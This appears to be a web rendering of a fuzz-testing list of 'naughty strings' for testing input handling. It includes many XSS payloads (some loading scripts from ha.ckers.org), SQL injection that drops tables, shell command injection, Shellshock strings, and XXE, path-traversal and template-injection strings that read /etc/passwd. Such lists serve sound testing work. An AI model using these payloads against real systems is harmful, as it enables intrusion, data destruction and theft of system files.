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\\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--1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,./;'[]\-= | &lt;&gt;?:"{}|_+ | !@#$%^&amp;*()`~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`⁄€‹›ﬁﬂ‡°·‚—±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val=`bar'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“&gt;&lt;script&gt;alert(4)&lt;/script&gt;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“;alert(15);t=” | ‘;alert(16);t=’ | JavaSCript:alert(17) | ;alert(18); | src=JaVaSCript:prompt(19) | “&gt;&lt;script&gt;alert(20);&lt;/script x=” | ‘&gt;&lt;script&gt;alert(21);&lt;/script x=’ | &gt;&lt;script&gt;alert(22);&lt;/script x= | " autofocus onkeyup=“javascript:alert(23) | ' autofocus onkeyup='javascript:alert(24) | &lt;script\x20type=“text/javascript”&gt;javascript:alert(25);&lt;/script&gt; | &lt;script\x3Etype=“text/javascript”&gt;javascript:alert(26);&lt;/script&gt; | &lt;script\x0Dtype=“text/javascript”&gt;javascript:alert(27);&lt;/script&gt; | &lt;script\x09type=“text/javascript”&gt;javascript:alert(28);&lt;/script&gt; | &lt;script\x0Ctype=“text/javascript”&gt;javascript:alert(29);&lt;/script&gt; | &lt;script\x2Ftype=“text/javascript”&gt;javascript:alert(30);&lt;/script&gt; | &lt;script\x0Atype=“text/javascript”&gt;javascript:alert(31);&lt;/script&gt; | '`"&gt;&lt;\x3Cscript&gt;javascript:alert(32)&lt;/script&gt; | '`"&gt;&lt;\x00script&gt;javascript:alert(33)&lt;/script&gt; | ABC&lt;div style=“x\x3Aexpression(javascript:alert(34)"&gt;DEF | ABC&lt;div style=“x:expression\x5C(javascript:alert(35)"&gt;DEF | ABC&lt;div style=“x:expression\x00(javascript:alert(36)"&gt;DEF | ABC&lt;div style=“x:exp\x00ression(javascript:alert(37)"&gt;DEF | ABC&lt;div style=“x:exp\x5Cression(javascript:alert(38)"&gt;DEF | ABC&lt;div style=“x:\x0Aexpression(javascript:alert(39)"&gt;DEF | ABC&lt;div style=“x:\x09expression(javascript:alert(40)"&gt;DEF | ABC&lt;div style=“x:\xE3\x80\x80expression(javascript:alert(41)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x84expression(javascript:alert(42)"&gt;DEF | ABC&lt;div style=“x:\xC2\xA0expression(javascript:alert(43)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x80expression(javascript:alert(44)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x8Aexpression(javascript:alert(45)"&gt;DEF | ABC&lt;div style=“x:\x0Dexpression(javascript:alert(46)"&gt;DEF | ABC&lt;div style=“x:\x0Cexpression(javascript:alert(47)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x87expression(javascript:alert(48)"&gt;DEF | ABC&lt;div style=“x:\xEF\xBB\xBFexpression(javascript:alert(49)"&gt;DEF | ABC&lt;div style=“x:\x20expression(javascript:alert(50)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x88expression(javascript:alert(51)"&gt;DEF | ABC&lt;div style=“x:\x00expression(javascript:alert(52)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x8Bexpression(javascript:alert(53)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x86expression(javascript:alert(54)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x85expression(javascript:alert(55)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x82expression(javascript:alert(56)"&gt;DEF | ABC&lt;div style=“x:\x0Bexpression(javascript:alert(57)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x81expression(javascript:alert(58)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x83expression(javascript:alert(59)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x89expression(javascript:alert(60)"&gt;DEF | &lt;a href="\x0Bjavascript:javascript:alert(61)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x0Fjavascript:javascript:alert(62)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xC2\xA0javascript:javascript:alert(63)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x05javascript:javascript:alert(64)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE1\xA0\x8Ejavascript:javascript:alert(65)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x18javascript:javascript:alert(66)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x11javascript:javascript:alert(67)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x88javascript:javascript:alert(68)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x89javascript:javascript:alert(69)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x80javascript:javascript:alert(70)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x17javascript:javascript:alert(71)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x03javascript:javascript:alert(72)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x0Ejavascript:javascript:alert(73)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x1Ajavascript:javascript:alert(74)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x00javascript:javascript:alert(75)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x10javascript:javascript:alert(76)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x82javascript:javascript:alert(77)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x20javascript:javascript:alert(78)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x13javascript:javascript:alert(79)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x09javascript:javascript:alert(80)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x8Ajavascript:javascript:alert(81)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x14javascript:javascript:alert(82)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x19javascript:javascript:alert(83)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\xAFjavascript:javascript:alert(84)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x1Fjavascript:javascript:alert(85)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x81javascript:javascript:alert(86)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x1Djavascript:javascript:alert(87)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x87javascript:javascript:alert(88)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x07javascript:javascript:alert(89)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE1\x9A\x80javascript:javascript:alert(90)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x83javascript:javascript:alert(91)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x04javascript:javascript:alert(92)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x01javascript:javascript:alert(93)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x08javascript:javascript:alert(94)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x84javascript:javascript:alert(95)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x86javascript:javascript:alert(96)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE3\x80\x80javascript:javascript:alert(97)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x12javascript:javascript:alert(98)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x0Djavascript:javascript:alert(99)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x0Ajavascript:javascript:alert(100)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x0Cjavascript:javascript:alert(101)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x15javascript:javascript:alert(102)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\xA8javascript:javascript:alert(103)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x16javascript:javascript:alert(104)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x02javascript:javascript:alert(105)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x1Bjavascript:javascript:alert(106)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x06javascript:javascript:alert(107)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\xA9javascript:javascript:alert(108)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x85javascript:javascript:alert(109)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x1Ejavascript:javascript:alert(110)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x81\x9Fjavascript:javascript:alert(111)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x1Cjavascript:javascript:alert(112)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href=“javascript\x00:javascript:alert(113)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href=“javascript\x3A:javascript:alert(114)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href=“javascript\x09:javascript:alert(115)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href=“javascript\x0D:javascript:alert(116)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href=“javascript\x0A:javascript:alert(117)” id=“fuzzelement1”&gt;test&lt;/a&gt; | `"'&gt;&lt;img src=xxx:x \x0Aonerror=javascript:alert(118)&gt; | `"'&gt;&lt;img src=xxx:x \x22onerror=javascript:alert(119)&gt; | `"'&gt;&lt;img src=xxx:x \x0Bonerror=javascript:alert(120)&gt; | `"'&gt;&lt;img src=xxx:x \x0Donerror=javascript:alert(121)&gt; | `"'&gt;&lt;img src=xxx:x \x2Fonerror=javascript:alert(122)&gt; | `"'&gt;&lt;img src=xxx:x \x09onerror=javascript:alert(123)&gt; | `"'&gt;&lt;img src=xxx:x \x0Conerror=javascript:alert(124)&gt; | `"'&gt;&lt;img src=xxx:x \x00onerror=javascript:alert(125)&gt; | `"'&gt;&lt;img src=xxx:x \x27onerror=javascript:alert(126)&gt; | `"'&gt;&lt;img src=xxx:x \x20onerror=javascript:alert(127)&gt; | "`'&gt;&lt;script&gt;\x3Bjavascript:alert(128)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x0Djavascript:alert(129)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xEF\xBB\xBFjavascript:alert(130)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x81javascript:alert(131)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x84javascript:alert(132)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE3\x80\x80javascript:alert(133)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x09javascript:alert(134)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x89javascript:alert(135)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x85javascript:alert(136)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x88javascript:alert(137)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x00javascript:alert(138)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\xA8javascript:alert(139)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x8Ajavascript:alert(140)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE1\x9A\x80javascript:alert(141)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x0Cjavascript:alert(142)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x2Bjavascript:alert(143)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xF0\x90\x96\x9Ajavascript:alert(144)&lt;/script&gt; | "`'&gt;&lt;script&gt;-javascript:alert(145)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x0Ajavascript:alert(146)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\xAFjavascript:alert(147)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x7Ejavascript:alert(148)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x87javascript:alert(149)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x81\x9Fjavascript:alert(150)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\xA9javascript:alert(151)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xC2\x85javascript:alert(152)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xEF\xBF\xAEjavascript:alert(153)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x83javascript:alert(154)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x8Bjavascript:alert(155)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xEF\xBF\xBEjavascript:alert(156)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x80javascript:alert(157)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x21javascript:alert(158)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x82javascript:alert(159)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x86javascript:alert(160)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE1\xA0\x8Ejavascript:alert(161)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x0Bjavascript:alert(162)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x20javascript:alert(163)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xC2\xA0javascript:alert(164)&lt;/script&gt;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src=x\x13onerror=“javascript:alert(191)"&gt; | &lt;img[a][b][c]src[d]=x[e]onerror=[f]“alert(192)"&gt;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src=“x` `&lt;script&gt;javascript:alert(200)&lt;/script&gt;"` `&gt; | &lt;img src onerror /” '"= alt=javascript:alert(201)//"&gt; | &lt;title onpropertychange=javascript:alert(202)&gt;&lt;/title&gt;&lt;title title=&gt; | &lt;a href=http://foo.bar/#x=`y&gt;&lt;/a&gt;&lt;img alt="`&gt;&lt;img src=x:x onerror=javascript:alert(203)&gt;&lt;/a&gt;"&gt; | &lt;!--[if]&gt;&lt;script&gt;javascript:alert(204)&lt;/script --&gt; | &lt;!--[if&lt;img src=x onerror=javascript:alert(205)//]&gt; --&gt; | &lt;script src="/\%(jscript)s”&gt;&lt;/script&gt; | &lt;script src="\\%(jscript)s”&gt;&lt;/script&gt; | &lt;IMG """&gt;&lt;SCRIPT&gt;alert(“206”)&lt;/SCRIPT&gt;"&gt; | &lt;IMG SRC=javascript:alert(String.fromCharCode(50,48,55))&gt; | &lt;IMG SRC=# onmouseover="alert(‘208’)"&gt; | &lt;IMG SRC= onmouseover="alert(‘209’)"&gt; | &lt;IMG onmouseover="alert(‘210’)"&gt;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ascript:alert(‘214’);"&gt; | &lt;IMG SRC="jav&amp;#x09;ascript:alert(‘215’);"&gt; | &lt;IMG SRC="jav&amp;#x0A;ascript:alert(‘216’);"&gt; | &lt;IMG SRC=“jav&amp;#x0D;ascript:alert(‘217’);"&gt; | perl -e ‘print "&lt;IMG SRC=java\0script:alert(\"218\")&gt;";’ &gt; out | &lt;IMG SRC=” &amp;#14;  javascript:alert(‘219’);"&gt; | &lt;SCRIPT/XSS SRC=“http://ha.ckers.org/xss.js”&gt;&lt;/SCRIPT&gt; | &lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(“220”)&gt; | &lt;SCRIPT/SRC=“http://ha.ckers.org/xss.js”&gt;&lt;/SCRIPT&gt; | &lt;&lt;SCRIPT&gt;alert(“221”);//&lt;&lt;/SCRIPT&gt; | &lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt; B &gt; | &lt;SCRIPT SRC=//ha.ckers.org/.j&gt; | &lt;IMG SRC=“javascript:alert(‘222’)” | &lt;iframe src=http://ha.ckers.org/scriptlet.html &lt; | \";alert(‘223’);// | &lt;u oncopy=alert()&gt; Copy me&lt;/u&gt; | &lt;i onwheel=alert(224)&gt; Scroll over me &lt;/i&gt; | &lt;plaintext&gt; | http://a/%%30%30 | &lt;/textarea&gt;&lt;script&gt;alert(225)&lt;/script&gt; | 1;DROP TABLE users | 1'; DROP TABLE users-- 1 | ' OR 1=1 -- 1 | ' OR ‘1’='1 | '; EXEC sp_MSForEachTable 'DROP TABLE ?'; -- |   | % | _ | - | -- | --version | --help | $USER | /dev/null; touch /tmp/blns.fail ; echo | `touch /tmp/blns.fail` | $(touch /tmp/blns.fail) | @{[system “touch /tmp/blns.fail”]} | eval("puts ‘hello world’") | System("ls -al /") | `ls -al /` | Kernel.exec("ls -al /") | Kernel.exit(1) | %x(‘ls -al /') | &lt;?xml version=“1.0” encoding=“ISO-8859-1”?&gt;&lt;!DOCTYPE foo [ &lt;!ELEMENT foo ANY &gt;&lt;!ENTITY xxe SYSTEM “file:///etc/passwd” &gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt; | $HOME | $ENV{‘HOME’} | %d | %s%s%s%s%s | {0} | %*.*s | %@ | %n | File:/// | ../../../../../../../../../../../etc/passwd%00 | ../../../../../../../../../../../etc/hosts | () { 0; }; touch /tmp/blns.shellshock1.fail; | () { _; } &gt;_[$($())]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[0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue | But now...[20Cfor my greatest trick...[8m | The quick brown fox... [Beeeep] | Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗 | 🏳0🌈️ | జ్ఞ‌ా | گچپژ | {% print ‘x’ * 64 * 1024**3 %} | {{ “".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd”).read()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,./;'[]\-=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&lt;&gt;?:"{}|_+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!@#$%^&amp;*()`~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‘"’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“''''"'”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“'"'"''''”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val=“bar”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val=“bar”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val=”bar“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val=`bar'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__ﾛ(,_,*)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・(￣∀￣)・:*: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,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’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¯\_(ツ)_/¯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&lt;script&gt;alert(0)&lt;/script&gt;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&amp;lt;script&amp;gt;alert(&amp;#39;1&amp;#39;);&amp;lt;/script&amp;gt;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onerror=alert(2)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&lt;svg&gt;&lt;script&gt;123&lt;1&gt;alert(3)&lt;/script&gt;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"&gt;&lt;script&gt;alert(4)&lt;/script&gt;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'&gt;&lt;script&gt;alert(5)&lt;/script&gt;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&gt;&lt;script&gt;alert(6)&lt;/script&gt;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&lt;/script&gt;&lt;script&gt;alert(7)&lt;/script&gt;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&lt;sc&lt;script&gt;ript&gt;alert(13)&lt;/sc&lt;/script&gt;ript&gt;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--&gt;&lt;script&gt;alert(14)&lt;/script&gt;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“;alert(15);t=”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‘;alert(16);t=’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“&gt;&lt;script&gt;alert(20);&lt;/script x=”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‘&gt;&lt;script&gt;alert(21);&lt;/script x=’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&gt;&lt;script&gt;alert(22);&lt;/script x=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onkeyup="javascript:alert(23)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onkeyup='javascript:alert(24)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&lt;script\x20type=“text/javascript”&gt;javascript:alert(25);&lt;/script&gt;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&lt;script\x3Etype=“text/javascript”&gt;javascript:alert(26);&lt;/script&gt;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&lt;script\x0Dtype=“text/javascript”&gt;javascript:alert(27);&lt;/script&gt;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&lt;script\x09type=“text/javascript”&gt;javascript:alert(28);&lt;/script&gt;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&lt;script\x0Ctype=“text/javascript”&gt;javascript:alert(29);&lt;/script&gt;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&lt;script\x2Ftype=“text/javascript”&gt;javascript:alert(30);&lt;/script&gt;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&lt;script\x0Atype=“text/javascript”&gt;javascript:alert(31);&lt;/script&gt;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'`"&gt;&lt;\x3Cscript&gt;javascript:alert(32)&lt;/script&gt;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'`"&gt;&lt;\x00script&gt;javascript:alert(33)&lt;/script&gt;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style="x\x3Aexpression(javascript:alert(34)"&gt;DEF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style="x:expression\x5C(javascript:alert(35)"&gt;DEF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style="x:expression\x00(javascript:alert(36)"&gt;DEF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style="x:exp\x00ression(javascript:alert(37)"&gt;DEF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style="x:exp\x5Cression(javascript:alert(38)"&gt;DEF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style="x:\x0Aexpression(javascript:alert(39)"&gt;DEF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style="x:\x09expression(javascript:alert(40)"&gt;DEF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style="x:\xE3\x80\x80expression(javascript:alert(41)"&gt;DEF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style="x:\xE2\x80\x84expression(javascript:alert(42)"&gt;DEF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style="x:\xC2\xA0expression(javascript:alert(43)"&gt;DEF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style="x:\xE2\x80\x80expression(javascript:alert(44)"&gt;DEF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style="x:\xE2\x80\x8Aexpression(javascript:alert(45)"&gt;DEF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style="x:\x0Dexpression(javascript:alert(46)"&gt;DEF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style="x:\x0Cexpression(javascript:alert(47)"&gt;DEF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style="x:\xE2\x80\x87expression(javascript:alert(48)"&gt;DEF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style="x:\xEF\xBB\xBFexpression(javascript:alert(49)"&gt;DEF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style="x:\x20expression(javascript:alert(50)"&gt;DEF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style="x:\xE2\x80\x88expression(javascript:alert(51)"&gt;DEF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style="x:\x00expression(javascript:alert(52)"&gt;DEF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style="x:\xE2\x80\x8Bexpression(javascript:alert(53)"&gt;DEF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style="x:\xE2\x80\x86expression(javascript:alert(54)"&gt;DEF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style="x:\xE2\x80\x85expression(javascript:alert(55)"&gt;DEF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style="x:\xE2\x80\x82expression(javascript:alert(56)"&gt;DEF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style="x:\x0Bexpression(javascript:alert(57)"&gt;DEF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style="x:\xE2\x80\x81expression(javascript:alert(58)"&gt;DEF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style="x:\xE2\x80\x83expression(javascript:alert(59)"&gt;DEF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style="x:\xE2\x80\x89expression(javascript:alert(60)"&gt;DEF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href=“javascript\x00:javascript:alert(113)”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href=“javascript\x3A:javascript:alert(114)”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href=“javascript\x09:javascript:alert(115)”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href=“javascript\x0D:javascript:alert(116)”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href=“javascript\x0A:javascript:alert(117)”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"`'&gt;&lt;script&gt;\x3Bjavascript:alert(128)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x0Djavascript:alert(129)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xEF\xBB\xBFjavascript:alert(130)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x81javascript:alert(131)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x84javascript:alert(132)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE3\x80\x80javascript:alert(133)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x09javascript:alert(134)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x89javascript:alert(135)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x85javascript:alert(136)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x88javascript:alert(137)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x00javascript:alert(138)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\xA8javascript:alert(139)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x8Ajavascript:alert(140)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE1\x9A\x80javascript:alert(141)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x0Cjavascript:alert(142)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x2Bjavascript:alert(143)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xF0\x90\x96\x9Ajavascript:alert(144)&lt;/script&gt;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"`'&gt;&lt;script&gt;-javascript:alert(145)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x0Ajavascript:alert(146)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\xAFjavascript:alert(147)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x7Ejavascript:alert(148)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x87javascript:alert(149)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x81\x9Fjavascript:alert(150)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\xA9javascript:alert(151)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xC2\x85javascript:alert(152)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xEF\xBF\xAEjavascript:alert(153)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x83javascript:alert(154)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x8Bjavascript:alert(155)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xEF\xBF\xBEjavascript:alert(156)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x80javascript:alert(157)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x21javascript:alert(158)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x82javascript:alert(159)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x86javascript:alert(160)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE1\xA0\x8Ejavascript:alert(161)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x0Bjavascript:alert(162)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x20javascript:alert(163)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xC2\xA0javascript:alert(164)&lt;/script&gt;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onerror="javascript:alert(167)"&gt;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onerror="javascript:alert(168)"&gt;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onerror="javascript:alert(170)"&gt;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onerror="javascript:alert(171)"&gt;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onerror="javascript:alert(172)"&gt;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onerror="javascript:alert(174)"&gt;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onerror="javascript:alert(176)"&gt;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onerror="javascript:alert(177)"&gt;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onerror="javascript:alert(179)"&gt;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onerror="javascript:alert(180)"&gt;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onerror="javascript:alert(181)"&gt;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onerror="javascript:alert(182)"&gt;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onerror="javascript:alert(183)"&gt;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onerror="javascript:alert(184)"&gt;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onerror="javascript:alert(185)"&gt;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onerror="javascript:alert(186)"&gt;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src=x\x09onerror="javascript:alert(187)"&gt;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src=x\x10onerror="javascript:alert(188)"&gt;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src=x\x11onerror="javascript:alert(189)"&gt;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src=x\x12onerror="javascript:alert(190)"&gt;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src=x\x13onerror="javascript:alert(191)"&gt;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&lt;img[a][b][c]src[d]=x[e]onerror=[f]"alert(192)"&gt;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href=java&amp;#1&amp;#2&amp;#3&amp;#4&amp;#5&amp;#6&amp;#7&amp;#8&amp;#11&amp;#12script:javascript:alert(199)&gt;XXX&lt;/a&gt;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src="x` `&lt;script&gt;javascript:alert(200)&lt;/script&gt;"` `&gt;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/" '"= alt=javascript:alert(201)//"&gt;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&lt;title onpropertychange=javascript:alert(202)&gt;&lt;/title&gt;&lt;title title=&gt;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href=http://foo.bar/#x=`y&gt;&lt;/a&gt;&lt;img alt="`&gt;&lt;img src=x:x onerror=javascript:alert(203)&gt;&lt;/a&gt;"&gt;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&lt;!--[if]&gt;&lt;script&gt;javascript:alert(204)&lt;/script --&gt;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&lt;!--[if&lt;img src=x onerror=javascript:alert(205)//]&gt; --&gt;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src="/\%(jscript)s"&gt;&lt;/script&gt;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src="\\%(jscript)s"&gt;&lt;/script&gt;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"""&gt;&lt;SCRIPT&gt;alert(“206”)&lt;/SCRIPT&gt;"&gt;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SRC=javascript:alert(String.fromCharCode(50,48,55))&gt;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SRC=# onmouseover="alert(‘208’)"&gt;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onmouseover="alert(‘209’)"&gt;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onmouseover="alert(‘210’)"&gt;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SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#50;&amp;#49;&amp;#49;&amp;#39;&amp;#41;&gt;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SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x32&amp;#x31&amp;#x33&amp;#x27&amp;#x29&gt;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   ascript:alert(‘214’);"&gt;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SRC="jav&amp;#x09;ascript:alert(‘215’);"&gt;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SRC="jav&amp;#x0A;ascript:alert(‘216’);"&gt;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SRC="jav&amp;#x0D;ascript:alert(‘217’);"&gt;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perl -e ‘print "&lt;IMG SRC=java\0script:alert(\"218\")&gt;";’ &gt; out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 &amp;#14;  javascript:alert(‘219’);"&gt;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&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(“220”)&gt;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&lt;&lt;SCRIPT&gt;alert(“221”);//&lt;&lt;/SCRIPT&gt;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SRC=http://ha.ckers.org/xss.js?&lt; B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SRC=//ha.ckers.org/.j&gt;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SRC=“javascript:alert(‘222’)”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&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;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\";alert(‘223’);//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&lt;u oncopy=alert()&gt; Copy me&lt;/u&gt;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 onwheel=alert(224)&gt; Scroll over me &lt;/i&gt;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&lt;plaintext&gt;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&lt;/textarea&gt;&lt;script&gt;alert(225)&lt;/script&gt;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1'; DROP TABLE users-- 1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1=1 -- 1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‘1’='1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'; EXEC sp_MSForEachTable 'DROP TABLE ?'; --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--version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--help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`touch /tmp/blns.fail`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@{[system “touch /tmp/blns.fail”]}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eval("puts ‘hello world’")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System("ls -al /")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`ls -al /`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Kernel.exec("ls -al /")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%x('ls -al /')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&lt;?xml version=“1.0” encoding=“ISO-8859-1”?&gt;&lt;!DOCTYPE foo [ &lt;!ELEMENT foo ANY &gt;&lt;!ENTITY xxe SYSTEM “file:///etc/passwd” &gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;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$ENV{‘HOME’}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%*.*s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() { _; } &gt;_[$($())] { touch /tmp/blns.shellshock2.fail; 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&lt;&lt;&lt; %s(un='%s') = %u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+++ATH0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http://www.cum.qc.ca/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Roses are 